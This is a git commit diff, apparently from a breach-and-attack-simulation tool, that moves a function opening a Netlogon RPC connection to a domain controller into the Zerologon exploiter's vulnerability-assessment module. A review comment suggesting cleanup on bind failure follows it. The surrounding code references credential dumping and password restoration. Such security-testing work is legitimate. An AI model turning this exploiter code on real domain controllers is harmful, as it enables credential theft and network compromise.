Agent: Move connect_to_dc to vuln_assessment.py

Kekoa Kaaikala 2022-10-07 19:38:18 +00:00
parent 86edb63cb4
commit 374d3d8a50
2 changed files with 20 additions and 17 deletions


@ -12,11 +12,10 @@ from binascii import unhexlify
from typing import Dict, List, Optional, Sequence, Tuple
import impacket
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5.dtypes import NULL
from common.agent_events import CredentialsStolenEvent, PasswordRestorationEvent
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.credentials import Credentials, LMHash, NTHash, Username
from common.tags import (
T1003_ATTACK_TECHNIQUE_TAG,
@ -27,7 +26,11 @@ from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.wmi_tools import WmiTools
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
from infection_monkey.exploit.zerologon_utils.vuln_assessment import (
connect_to_dc,
get_dc_details,
is_exploitable,
)
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
from infection_monkey.i_puppet import ExploiterResultData
from infection_monkey.utils.capture_output import StdoutCapture
@ -113,16 +116,6 @@ class ZerologonExploiter(HostExploiter):
return self.exploit_result
@staticmethod
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result = self.try_exploit_attempt(rpc_con)
@ -230,7 +223,7 @@ class ZerologonExploiter(HostExploiter):
# Connect to the DC's Netlogon service.
try:
rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
rpc_con = connect_to_dc(self.dc_ip)
except Exception as e:
logger.info(f"Exception occurred while connecting to DC: {str(e)}")
return False


@ -2,9 +2,9 @@ import logging
from typing import Optional, Tuple
import nmb.NetBIOS
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.utils.exceptions import DomainControllerNameFetchError
from infection_monkey.model import VictimHost
from infection_monkey.utils.threading import interruptible_iter
@ -12,6 +12,16 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__)
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def get_dc_details(host: VictimHost) -> Tuple[str, str, str]:
dc_ip = host.ip_addr
dc_name = _get_dc_name(dc_ip=dc_ip)
@ -39,7 +49,7 @@ def _get_dc_name(dc_ip: str) -> str:
def is_exploitable(zerologon_exploiter_object) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
# Connect to the DC's Netlogon service.
try:
rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip)
rpc_con = connect_to_dc(zerologon_exploiter_object.dc_ip)
except Exception as err:
error_message = f"Exception occurred while connecting to DC: {err}"
logger.info(error_message)
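Review bot: In the new module-level `connect_to_dc`, a failure in `rpc_con.bind(...)` after `rpc_con.connect()` has succeeded leaves the transport open, because the callers shown on this page only catch the exception and log it. Disconnecting before re-raising would stop failed attempts from holding sockets to the domain controller until garbage collection. While the function is being moved, its signature could also be tightened to `dc_ip: str` and `-> rpcrt.DCERPC_v5`, matching the `Optional[rpcrt.DCERPC_v5]` that `is_exploitable` already declares, and a one-line docstring stating that it returns a connection bound to the Netlogon interface would help. The body of `is_exploitable` continues outside the last hunk, so how the returned connection is released there cannot be checked from this page.

```python
def connect_to_dc(dc_ip: str) -> rpcrt.DCERPC_v5:
    # … unchanged: endpoint mapping, transport creation, connect timeout …
    rpc_con = rpc_transport.get_dce_rpc()
    rpc_con.connect()
    try:
        rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
    except Exception:
        # Do not leave a connected-but-unbound transport open.
        rpc_con.disconnect()
        raise
    return rpc_con
```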